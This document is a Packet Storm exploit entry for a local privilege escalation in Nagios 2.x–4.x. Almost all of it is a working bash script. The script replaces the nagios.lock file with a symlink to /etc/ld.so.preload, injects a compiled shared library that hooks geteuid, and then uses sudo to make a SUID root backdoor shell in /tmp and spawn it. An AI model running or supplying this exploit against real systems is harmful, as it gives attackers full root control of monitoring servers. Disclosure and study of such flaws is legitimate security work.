Nagios 2.x / 3.x / 4.x Local Privilege Escalation

2016-12-02T00:00:00
ID PACKETSTORM:140292
Type packetstorm
Reporter Vincent Malguy
Modified 2016-12-02T00:00:00

Description

                                        
                                            `Exploit :  
#!/bin/bash -p  
#  
  
  
  
TARGETSERVICE="Nagios"  
LOWUSER="nagios"  
TARGETPATH="/usr/local/nagios/var/nagios.lock"  
  
BACKDOORSH="/bin/bash"  
BACKDOORPATH="/tmp/rootbackdoor"  
PRIVESCLIB="/tmp/privesclib.so"  
PRIVESCSRC="/tmp/privesclib.c"  
SUIDBIN="/usr/bin/sudo"  
  
function cleanexit {  
# Cleanup  
echo -e "\n[+] Cleaning up..."  
rm -f $PRIVESCSRC  
rm -f $PRIVESCLIB  
rm -f $TARGETPATH  
touch $TARGETPATH  
if [ -f /etc/ld.so.preload ]; then  
echo -n > /etc/ld.so.preload  
fi  
echo -e "\n[+] Job done. Exiting with code $1 \n"  
exit $1  
}  
  
function ctrl_c() {  
echo -e "\n[+] Active exploitation aborted. Remember you can use   
-deferred switch for deferred exploitation."  
cleanexit 0  
}  
  
#intro  
echo -e "\033[94m \nNagios - Root Privilege Escalation PoC Exploit   
\nNagios-chowned.sh (ver. 1.0)\n\nCVE-2016-XXXX \n"  
echo -e "Discovered by: Vincent Malguy\n Original exploit code borrow   
from Dawid Golunski http://legalhackers.com (Thanks!)\033[0m"  
  
  
# Priv check  
  
echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"  
id | grep -q ${LOWUSER}  
if [ $? -ne 0 ]; then  
echo -e "\n[!] You need to execute the exploit as ${LOWUSER} user!   
Exiting.\n"  
exit 3  
fi  
  
  
echo -e "\n[+] Target ${LOWUSER} file set to $TARGETPATH "  
  
# [ Active exploitation ]  
  
trap ctrl_c INT  
# Compile privesc preload library  
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"  
cat <<_solibeof_>$PRIVESCSRC  
#define _GNU_SOURCE  
#include <stdio.h>  
#include <sys/stat.h>  
#include <unistd.h>  
#include <dlfcn.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
  
uid_t geteuid(void) {  
static uid_t (*old_geteuid)();  
old_geteuid = dlsym(RTLD_NEXT, "geteuid");  
if ( old_geteuid() == 0 ) {  
chown("$BACKDOORPATH", 0, 0);  
chmod("$BACKDOORPATH", 04777);  
//unlink("/etc/ld.so.preload");  
}  
return old_geteuid();  
}  
_solibeof_  
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"  
if [ $? -ne 0 ]; then  
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."  
cleanexit 2;  
fi  
  
  
# Prepare backdoor shell  
cp $BACKDOORSH $BACKDOORPATH  
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l   
$BACKDOORPATH`"  
  
# Safety check  
if [ -f /etc/ld.so.preload ]; then  
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."  
exit 2  
fi  
  
# Symlink the log file to /etc  
rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH  
if [ $? -ne 0 ]; then  
echo -e "\n[!] Couldn't remove the $TARGETPATH file or create a   
symlink."  
cleanexit 3  
fi  
echo -e "\n[+] Symlink created at: \n`ls -l $TARGETPATH`"  
  
# Kill target service if possible  
#echo -ne "\n[+] Killing ${TARGETSERVICE}...\n"  
#killall ${TARGETSERVICE}  
  
  
  
# Wait for target service startup to re-create target file  
echo -ne "\n[+] Waiting for ${TARGETSERVICE} startup to re-create the   
${TARGETPATH}...\n"  
  
while :; do  
# if target file can be recreated by target process (like logs files),   
we need to keep remove and link it  
rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH  
sleep 0.1  
if [ -f /etc/ld.so.preload ]; then  
echo $PRIVESCLIB > /etc/ld.so.preload  
rm -f $TARGETPATH  
break;  
fi  
done  
  
# /etc/ld.so.preload dir should be owned by our low priv controled user   
at this point  
# Inject the privesc.so shared library to escalate privileges  
echo $PRIVESCLIB > /etc/ld.so.preload  
echo -e "\n[+] ${TARGETSERVICE} restarted. The /etc/ld.so.preload file   
got created with ${LOWUSER} privileges: \n`ls -l /etc/ld.so.preload`"  
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"  
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat   
/etc/ld.so.preload`"  
chmod 755 /etc/ld.so.preload  
  
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)  
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get   
root!"  
sudo 2>/dev/null >/dev/null  
  
  
# Check for the rootshell  
ls -l $BACKDOORPATH  
ls -l $BACKDOORPATH | grep rws | grep -q root  
if [ $? -eq 0 ]; then  
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l   
$BACKDOORPATH`"  
echo -e "\n\033[94mGot root! The ${TARGETSERVICE} server has been   
ch-OWNED !\033[0m"  
else  
echo -e "\n[!] Failed to get root"  
cleanexit 2  
fi  
  
  
# Execute the rootshell  
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"  
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"  
$BACKDOORPATH -p  
  
# Job done.  
cleanexit 0  
  
`